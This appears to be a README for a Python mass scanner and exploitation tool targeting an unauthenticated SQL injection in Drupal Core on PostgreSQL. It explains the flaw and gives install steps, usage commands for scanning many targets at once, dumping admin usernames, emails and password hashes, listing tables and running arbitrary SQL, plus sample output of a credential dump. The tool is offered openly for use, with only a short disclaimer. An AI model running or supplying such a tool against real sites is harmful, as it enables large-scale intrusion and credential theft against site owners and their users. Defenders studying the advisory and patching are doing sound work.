Share
## https://sploitus.com/exploit?id=1774D6F8-2B0F-5C66-A7AB-BE7B8E7A0B85
CVE-2026-9082 โ€” Drupal PostgreSQL SQL Injection
Mass Scanner & Exploitation Tool


  Unauthenticated SQL Injection in Drupal Core (PostgreSQL)
  JSON:API filter array key injection via PDO placeholder name abuse


---

## Overview

**CVE-2026-9082** is a **Highly Critical** SQL injection vulnerability in **Drupal Core** affecting all **PostgreSQL-backed** sites running Drupal **8.0 through 11.3.9**. Added to the **CISA Known Exploited Vulnerabilities (KEV) catalog on 2026-05-22** โ€” actively exploited in the wild.

### Impact

| Severity | CVSS | Auth Required | Attack Vector |
|----------|------|---------------|---------------|
| Critical | 9.8+ | None | HTTP (JSON:API) |

- **Data exfiltration** โ€” extract databases, users, password hashes
- **Privilege escalation** โ€” create admin accounts, modify content
- **Remote code execution** โ€” in some configurations via `pg_exec()` or `COPY ... PROGRAM`

### Affected Versions

| Status | Versions |
|--------|----------|
| โŒ Vulnerable | Drupal 8.0.0 โ†’ 11.3.9 (PostgreSQL backend) |
| โœ… Fixed | 11.3.10, 11.2.12, 10.6.9, 10.5.10 |

### How It Works

The flaw exists in `core/modules/pgsql/src/EntityQuery/Condition.php`. The `translateCondition()` method uses **user-controlled array keys** from JSON:API filter parameters to construct PDO placeholder names. PDO only parses `[a-zA-Z0-9_]` as placeholder names, so any suffix after `)` becomes **literal SQL** injected into the query.

```
JSON:API Filter โ†’ array key with SQL โ†’ PDO placeholder truncation โ†’ SQL injection
```

---

## Features

- โœ… **Mass scanner** โ€” scan hundreds of targets concurrently
- โœ… **Single target mode** โ€” check individual Drupal sites
- โœ… **Time-based detection** โ€” `pg_sleep()` blind SQLi confirmation
- โœ… **Boolean-based detection** โ€” row count comparison
- โœ… **Version extraction** โ€” identify PostgreSQL version
- โœ… **Database info** โ€” extract current user and database name
- โœ… **Admin credential dump** โ€” username, email, password hash (uid=1)
- โœ… **Table listing** โ€” enumerate all public tables
- โœ… **Custom SQL queries** โ€” run any extraction query
- โœ… **Proxy support** โ€” route through Burp Suite or similar
- โœ… **Output to file** โ€” save mass scan results
- โœ… **Colored terminal output** โ€” easy to read results

---

## Installation

### Prerequisites

- Python 3.8+
- `pip` (Python package manager)

### Install Dependencies

```bash
# Clone the repo
git clone https://github.com/ridhinva/CVE-2026-9082.git
cd CVE-2026-9082

# Install requirements
pip install requests
```

That's it! Only one dependency โ€” `requests`.

---

## Usage

### ๐Ÿ•ต๏ธ Check Single Target

```bash
python3 cve_2026_9082_scanner.py -u https://target.com --check
```

### ๐Ÿ“ก Mass Scan Multiple Targets

```bash
python3 cve_2026_9082_scanner.py -f targets.txt
```

**`targets.txt` format:**
```
https://target1.com
target2.com
192.168.1.100
```

### ๐Ÿ”“ Extract PostgreSQL Version

```bash
python3 cve_2026_9082_scanner.py -u https://target.com --version
```

### ๐Ÿ—„๏ธ Extract Database Info

```bash
python3 cve_2026_9082_scanner.py -u https://target.com --dbinfo
```

### ๐Ÿ‘ค Dump Admin Credentials (uid=1)

```bash
python3 cve_2026_9082_scanner.py -u https://target.com --admin
```

### ๐Ÿ“‹ List All Tables

```bash
python3 cve_2026_9082_scanner.py -u https://target.com --tables
```

### ๐Ÿ’‰ Custom SQL Query

```bash
python3 cve_2026_9082_scanner.py -u https://target.com --query "SELECT usename FROM pg_catalog.pg_user"
```

### Save Results to File

```bash
python3 cve_2026_9082_scanner.py -f targets.txt -o results.txt
```

### Use Proxy (Burp Suite)

```bash
python3 cve_2026_9082_scanner.py -u https://target.com --check --proxy http://127.0.0.1:8080
```

### Customize Timing

```bash
# Increase sleep time for time-based detection (default: 5s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --delay 10

# Increase HTTP timeout for slow targets (default: 30s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --timeout 60
```

---

## Command Reference

| Flag | Description |
|------|-------------|
| `-u, --url` | Single target URL |
| `-f, --file` | File with targets (one per line) |
| `-o, --output` | Save scan results to file |
| `--check` | Check if target is vulnerable |
| `--version` | Extract PostgreSQL version |
| `--dbinfo` | Extract DB user and database name |
| `--admin` | Extract Drupal admin credentials (uid=1) |
| `--tables` | List all database tables |
| `--query` | Custom SQL extraction query |
| `--threads` | Threads for mass scan (default: 20) |
| `--timeout` | HTTP request timeout (default: 30s) |
| `--delay` | pg_sleep delay for detection (default: 5s) |
| `--no-ssl-verify` | Skip TLS certificate verification |
| `--proxy` | HTTP proxy (e.g., http://127.0.0.1:8080) |

---

## Example Output

### Vulnerable Target
```
โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
โ•‘          CVE-2026-9082 - Drupal PostgreSQL SQLi             โ•‘
โ•‘       Mass Scanner + Exploitation Tool v1.0.0               โ•‘
โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
  CISA KEV: Added 2026-05-22  |  Advisory: SA-CORE-2026-004

[*] Checking: https://vulnerable-drupal-site.com

[!!] VULNERABLE - https://vulnerable-drupal-site.com
      Method: time-based (+5.2s)
      Resource: node/article
```

### Admin Credential Dump
```
[+] username: admin
[+] email: admin@example.com
[+] pass_hash: $S$E8gJ8yJ8...hashed_password...
```

---

## References

| Source | Link |
|--------|------|
| Drupal Advisory | [SA-CORE-2026-004](https://www.drupal.org/sa-core-2026-004) |
| CISA KEV | [CVE-2026-9082](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) |
| Patch Commit | [ea9524d9](https://git.drupalcode.org/project/drupal/-/commit/ea9524d9) |
| NVD Entry | [CVE-2026-9082](https://nvd.nist.gov/vuln/detail/CVE-2026-9082) |
| Discoverer | Michael Maturi |

---

## โš ๏ธ Disclaimer

**This tool is for authorized security testing, educational purposes, and ethical research only.**

Unauthorized access to computer systems is illegal. The authors assume no liability and are not responsible for any misuse or damage caused by this program.

---

## Author

**Ridhin V A** ([@ridhinva](https://github.com/ridhinva)) โ€” Bug bounty hunter & security researcher


  Built because CISA KEV said it's being exploited in the wild. Patch your Drupal sites.